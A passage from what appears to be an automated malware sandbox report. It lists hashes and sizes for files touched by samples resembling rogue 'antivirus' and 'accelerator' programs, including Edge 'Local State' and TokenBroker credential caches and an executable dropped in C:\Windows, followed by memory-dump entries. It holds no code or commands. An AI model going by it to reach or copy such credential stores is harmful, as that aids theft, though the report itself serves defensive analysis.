                                                                                                                                                                                  SHA256

                                                                                                                                                                                  ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  10KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  1081386c768dae3b2946e3d0c253f26f

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  2dec380a91948db8047ea1d28f8e256a1d600891

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  a583865a7c02cf05182755795e974b33f5946717779067f5459dc89816d2e879

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  3f8dd9659eea98385c71983b3b19cb91c6544a910055b0866091568dace0342777342394b6307fbc481eb0f418da4f7dd263cc9762483cf1b60e09710de703e3

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  11KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  2fb6443882e10f4e88043aba592916be

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  4499c637b9b7f69e61205e2b022f4b2ba45939bf

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  34c98c73b1d409234cfc82eedbe5d3863ac00df98c780b0c7c2915a7f6c6da58

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  012f7cafc97bc3058c2d7d621357a4e9a06638ad4ac03d2b4b623c7d3825037f2fea0605af6aad3e25b6edd12169c7a62b641dcf83e25f5ef9e496c1be7aeebb

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  11KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  c2e4fcc49f4eb72da6d9f3b77a22b9b0

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  4e94b357d143a9e49578062a3c90921aca493411

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  85ddddd3d450e9759a9e8f418b62bf231fa58858d35a0e7014465acf89bb723a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  41a746b7a7531ba6032985975e742aa3328e5f24e091c4f651fa83a66275fe5f5fe532dd875e104321c4a8facda7884e1229ab7b2d0471a629dda645ecc10abe

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  12KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  4c49e0c4ad8f123a4f9fb138b5657bc4

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  5baa2a7c0bf676c53e310403197aff7b939860a2

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  75d6b94dcf3ac8f0c0ff40250430589eec5c2eb9c5be7f2d86a9ceb49cf9e54c

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  dd540aa2763fdd0787bc87410875e1ee3b113bde5a0178e6605286604af34f3deb99b04940332521141c1813a108133ec3c4ee6dc2f0095618ce1e977ff2a7c1

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  10KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  12b24ecf3189d18b418e48f302f8caf1

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6e294a4fe5dc8465c9f6b7062cde6dd90a4d6763

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  42b562ab34b6c13673ac23b2eb413e671dc5ee693297df29ea5e708d41e74201

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0d5ffdfcf692bfe5b3f0ec056b6f39842f0203442089e9841f87ba2089d0d7da3c6ba160de2e230259ae33e0b4d9f0c6d612d581fdcaeeb7534c83fbf0588dcd

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  12KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  940d5606151ba79c4310e419a7376e50

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  3a68ab1526631122244ce9ce3df988af44139325

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  f6a5003afc66870eccbefab1d4ce2140c3c56c484440c55d4b85c6cc6bccf69a

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  0fedcd90fc0c749add1f7cb295d135b32251168be4dc7c84a6cf84ed45222c79b80c664d5ae6f3d74c80347e9c0d29856740be240a8112945fef1207dd4b05c5

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  12KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  7b947eeec75274b97b216f15ee0fdc15

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  795e6e8cb2d0d13cce3cda2dc7bb3fb145bbb1fc

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  262619f944e7290b976f7c6bbd17b6a4ad5bb34116ef426e64a96744b4580ef2

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  1e7e26932e1e5f903cd5e736405b617032d3e512da010fa0ea2c9144a9f697521f4bffdb718e9fc46d007fe671646efb291996b72726f022c795b897dee03028

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  12KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  e51d668a5a745a2900596d943e456ad9

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  7626fc16d4d3221a8b89a18ad4b7e98ace582f01

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  5193aa4eb185feec931120fb2c5dc1264766677a16c921b3d31333b00e02a2d0

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  5d2dd4c74fba790335dc48ced7c6373811a0bb63e070ac41cd69f1a246e77211afd99820921ec3cbb08fb9ea135c7e495443f1de73279fcafc27aa353de4f120

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  264KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  61de65bfb6376f63243f1fc62a523712

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  45ddce09fd526aa2c33a5a4bd3de3781474d037a

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  761105898e1866308abd141126778fe9e45bb1a16c1e092d14ccbf1296217202

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  dd331b2f6b29920db36ea14699339a84af5cf39be6c7fb3133edc9c00a3c89d2aee76c0a875e9708518beaba65971db5196b541742e50e0717076c79b3534517

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\9cd93bc6dcf544bae69531052e64647ec02f2bb4.tbres

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  9e2a7780f8470224da9bf3128bfb1c3a

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  83f98fb4fae50b8cd0df36e63855f5be81b03eab

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  b3d20d5c101e18969d672d825cf3ae0f2913db06dd7eeffc7022296dd8acc6fc

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  2f35b1109df6d53f26ea2d1b72454a40a80c17448176c49fcf8a04e27d27cb3ac29d8bec167f58a3d016398006e5d8156ecffc94f8bb02bd020aa1e5b739ffd9

                                                                                                                                                                                • C:\Users\Admin\Downloads\Antivirus Platinum.zip

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  699KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  ff84853a0f564152bd0b98d3fa63e695

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  47d628d279de8a0d47534f93fa5b046bb7f4c991

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  3aaa9e8ea7c213575fd3ac4ec004629b4ede0de06e243f6aad3cf2403e65d3f2

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  9ea41fe0652832e25fe558c6d97e9f9f85ccd8a5f4d00dbcc1525a20a953fbd76efb64d69ce0fdd53c2747159d68fcb4ac0fa340e0253b5401aebc7fb3774feb

                                                                                                                                                                                • C:\Users\Admin\Downloads\ProgramOverflow.zip

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  560KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  44481efd4f9a861444aa0aa05421a52e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  22e9b061f8fc3147dd0ec8a088a38272b0d30bcf

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  7b8632db07cb8693963402624e6ad884187b23f81ec7968fba2631909d5919b2

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  819cf783345751f6fb000142b59ebac5b72c8878adfaec1c9472bf242d7a469cdf21a2d89c6e292599606f19782c1951752f763bd89efed35e1b0f2d2fd52827

                                                                                                                                                                                • C:\Users\Admin\Downloads\Windows Accelerator Pro.zip

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1009KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  a42319a2a4e6e8a3ab825933b417a747

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  d27bec4e51652aa5a0e3e9bc27aae3a7a79638a5

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  6e6f0f4912aeadc81622c01e62cac6bbf02cd34052cdca2da582c92005275105

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  48c9eeb57e3c75ebf77ec3744c019eea2ced66ad260536718b0b8599fbc9612ea5456b19be7b30928c089e438336360249e8738eacb2cb9410449dfa55de68c2

                                                                                                                                                                                • C:\Windows\302746537.exe

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  22KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  8703ff2e53c6fd3bc91294ef9204baca

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  3dbb8f7f5dfe6b235486ab867a2844b1c2143733

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  3028a2b0e95143a4caa9bcd6ae794958e7469a20c6e673da067958cbf4310035

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d5eb8a07457a78f9acd0f81d2f58bbf64b52183318b87c353a590cd2a3ac3a6ec9c1452bd52306c7cf99f19b6a897b16ceb8289a7d008c5ce3b07eda9b871204

                                                                                                                                                                                • memory/1800-1283-0x0000000000400000-0x0000000000410000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/1800-1277-0x0000000000400000-0x0000000000410000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  64KB

                                                                                                                                                                                • memory/2336-1637-0x0000000000400000-0x000000000058A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.5MB

                                                                                                                                                                                • memory/2964-1291-0x0000000000400000-0x000000000040D000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  52KB

                                                                                                                                                                                • memory/2964-1288-0x0000000000400000-0x000000000040D000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  52KB

                                                                                                                                                                                • memory/2964-1286-0x0000000000400000-0x000000000040D000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  52KB

                                                                                                                                                                                • memory/2964-1282-0x0000000000400000-0x000000000040D000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  52KB

                                                                                                                                                                                • memory/3528-1476-0x0000000002620000-0x0000000002621000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1482-0x0000000003550000-0x0000000003551000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1450-0x0000000000C10000-0x0000000000C11000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1452-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1451-0x0000000002550000-0x0000000002551000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1453-0x0000000000BE0000-0x0000000000BE1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1455-0x0000000000C00000-0x0000000000C01000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1454-0x0000000002560000-0x0000000002561000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1456-0x0000000002540000-0x0000000002541000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1457-0x00000000034D0000-0x00000000034D1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1458-0x0000000000BF0000-0x0000000000BF1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1460-0x0000000002600000-0x0000000002601000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1461-0x0000000002580000-0x0000000002581000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1459-0x00000000034C0000-0x00000000034C3000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  12KB

                                                                                                                                                                                • memory/3528-1462-0x00000000025C0000-0x00000000025C1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1481-0x0000000003520000-0x0000000003521000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1464-0x00000000025F0000-0x00000000025F1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1465-0x0000000002680000-0x0000000002681000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1467-0x0000000002650000-0x0000000002651000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1466-0x0000000002630000-0x0000000002631000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1468-0x0000000002670000-0x0000000002671000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1469-0x0000000002660000-0x0000000002661000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1470-0x00000000025E0000-0x00000000025E1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1471-0x0000000003510000-0x0000000003511000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1472-0x0000000002570000-0x0000000002571000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1474-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1473-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1475-0x00000000034E0000-0x00000000034E1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1448-0x0000000000400000-0x000000000058A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.5MB

                                                                                                                                                                                • memory/3528-1478-0x00000000026E0000-0x00000000026E1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1449-0x00000000023D0000-0x000000000242F000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  380KB

                                                                                                                                                                                • memory/3528-1477-0x0000000002790000-0x0000000002791000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1463-0x00000000025A0000-0x00000000025A1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1480-0x0000000003530000-0x0000000003531000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1479-0x0000000002840000-0x0000000002841000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1483-0x0000000003540000-0x0000000003541000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1490-0x00000000035D0000-0x00000000035D1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1489-0x00000000035A0000-0x00000000035A1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1491-0x00000000035C0000-0x00000000035C1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1488-0x00000000035B0000-0x00000000035B1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1487-0x0000000003580000-0x0000000003581000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1493-0x00000000035E0000-0x00000000035E1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1492-0x00000000035F0000-0x00000000035F1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1486-0x0000000003590000-0x0000000003591000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1485-0x0000000003560000-0x0000000003561000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1484-0x0000000003570000-0x0000000003571000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1495-0x0000000003610000-0x0000000003611000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1494-0x0000000003620000-0x0000000003621000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1497-0x0000000003630000-0x0000000003631000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1496-0x0000000003640000-0x0000000003641000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1499-0x0000000003650000-0x0000000003651000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1498-0x0000000003660000-0x0000000003661000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1501-0x0000000003670000-0x0000000003671000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1500-0x0000000003680000-0x0000000003681000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1503-0x0000000003690000-0x0000000003691000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1502-0x00000000036A0000-0x00000000036A1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1504-0x00000000036C0000-0x00000000036C1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1505-0x00000000036B0000-0x00000000036B1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1506-0x00000000036E0000-0x00000000036E1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1507-0x00000000036D0000-0x00000000036D1000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1509-0x0000000003780000-0x0000000003781000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1510-0x0000000003770000-0x0000000003771000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  4KB

                                                                                                                                                                                • memory/3528-1522-0x0000000000400000-0x000000000058A000-memory.dmp

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  1.5MB